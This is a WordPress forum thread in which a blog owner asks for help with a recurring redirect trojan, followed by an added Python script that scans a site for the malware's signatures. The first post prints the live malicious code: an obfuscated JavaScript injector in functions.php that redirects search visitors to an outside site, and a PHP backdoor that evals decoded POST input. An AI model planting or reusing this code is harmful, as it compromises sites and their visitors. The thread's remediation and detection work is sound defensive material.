Can't get rid of a redirecting trojan (7 posts)

  1. alechevallier
    Posted 4 years ago #

    Hi everyone,

    We recently discovered that our WP blog was infected. It is a redirecting trojan that redirects our traffic from search engines to a site (www.googosearch.biz).

    We first identified the redirecting code in the functions.php file, and deleted it. It looked like this:

    add_action('get_footer', 'add_sscounter');
    	function add_sscounter(){
    		echo '<!--scounter-->';
    			if(time()%2 == 0 && !is_user_logged_in()){
    				echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";

    But the thing is that it comes back every day! It looks like another file on our server is generating it every day.

    I found a suspicious file that was added by a Russian guy via FTP (I checked the logs) on the root of the site (but note that the site is healthy, only the blog is redirecting) named default.php. It looked like this:

    <?php if($_GET["rnd"]){die($_GET["rnd"]);}elseif($_POST["e"]){eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST["e"]))))));exit;} ?>

    I deleted it thinking this code was generating the redirecting code. But it didn't do anything. The evil code is still showing up every morning in the functions.php file!

    Does someone have an idea of how this could be fixed?

    Thank you for your help,


  2. BeautyPirate
    Posted 4 years ago #

    Try the "WP-Malwatch" plugin. It might tell you where the bugger is. Make sure to select "hidded files" too.

  3. kmessinger
    Forum Moderator
    Posted 4 years ago #

  4. alechevallier
    Posted 4 years ago #

    @BeautyPirate: the WP-Malwatch scan didn't give anything :/

    @kmessinger: thanks for the links, I didn't read all of them. Should I delete the trojan code by the way?

  5. kmessinger
    Forum Moderator
    Posted 4 years ago #

    Delete it here? Yes, if you can still edit your posts.

    You have to be quite aggressive in getting rid of this. It will be in multiple files. Check your htaccess and do what those links describe.

  6. gabefair
    Posted 4 years ago #

    @Kmessinger just wondering, why not post the trojan code? Is it dangerous or just a policy? I wonder b/c I would like to search my site for some of the code pieces.

    UPDATE: I found that exact same code in a js file. Thanks for posting it

  7. kmessinger
    Forum Moderator
    Posted 4 years ago #

    Why not post the trojan code?

    Because there are some idiots out there that would use the code to infect sites. It is better to search for a common term like "eval(base64_decode" and to run virus protection software to scan your site.

    But, that is my opinion. I don't know if there is a formal policy on this but I did see a moderator tell a poster the same thing.
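Following the moderator's advice to search the site for strings like "eval(base64_decode", here is an added detection script (my own, not code from the thread or from WordPress) that walks a site tree for the signatures quoted above and also flags files modified in the last 24 hours, since the reinfection in this thread recurs every morning; the signature labels, the temp directory and the sample file contents are constructed for the demo.

```python
import os, re, time, tempfile
from pathlib import Path
# Signatures drawn from the code quoted in this thread; the labels are my own.
SIGNATURES = {
    "eval_base64": re.compile(r"eval\s*\(\s*base64_decode", re.I),
    "rot13_strrev_chain": re.compile(r"str_rot13\s*\(\s*strrev", re.I),
    "eval_of_request_input": re.compile(r"eval\s*\(.*\$_(POST|GET|REQUEST)\[", re.I),
    "packed_js_eval": re.compile(r"eval\(function\(p,a,c,k,e,[rd]\)"),
    "scounter_marker": re.compile(r"<!--scounter-->"),
}
SCAN_SUFFIXES = {".php", ".js", ".html", ".htm"}

def scan_text(text):
    """Sorted names of the signatures that match a file's contents."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

def scan_tree(root, recent_hours=24, now=None):
    """Report files with signature hits or modified within recent_hours; the mtime
    check catches a file rewritten every morning even by an unknown dropper."""
    now = time.time() if now is None else now
    findings = []
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        if path.suffix.lower() not in SCAN_SUFFIXES and path.name != ".htaccess":
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue  # unreadable files are skipped here; do not assume they are clean
        hits = scan_text(text)
        recent = (now - path.stat().st_mtime) <= recent_hours * 3600
        if hits or recent:
            findings.append({"path": str(path), "hits": hits, "recent": recent})
    return findings

def demo():
    """Scan a constructed mini site tree; findings keyed by relative POSIX path."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        theme = root / "wp-content" / "themes" / "t"
        theme.mkdir(parents=True)
        # Constructed samples shaped like the backdoor and footer hook in the thread.
        (root / "default.php").write_text(
            '<?php if($_POST["e"]){eval(base64_decode(str_rot13(strrev($_POST["e"]))));} ?>')
        (theme / "functions.php").write_text("<?php\necho '<!--scounter-->';\n")
        old = root / "wp-config.php"  # clean file, untouched for ten days
        old.write_text("<?php define('DB_NAME', 'wp'); ?>\n")
        stamp = time.time() - 10 * 24 * 3600
        os.utime(old, (stamp, stamp))
        return {Path(f["path"]).relative_to(root).as_posix(): f for f in scan_tree(root)}
```

Run scan_tree against the document root and review every reported file by hand; a hit list like this only narrows the search, and a file that keeps reappearing points at whatever writes it (cron job, another backdoor, or stolen FTP credentials), which must be closed too.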

Topic Closed

This topic has been closed to new replies.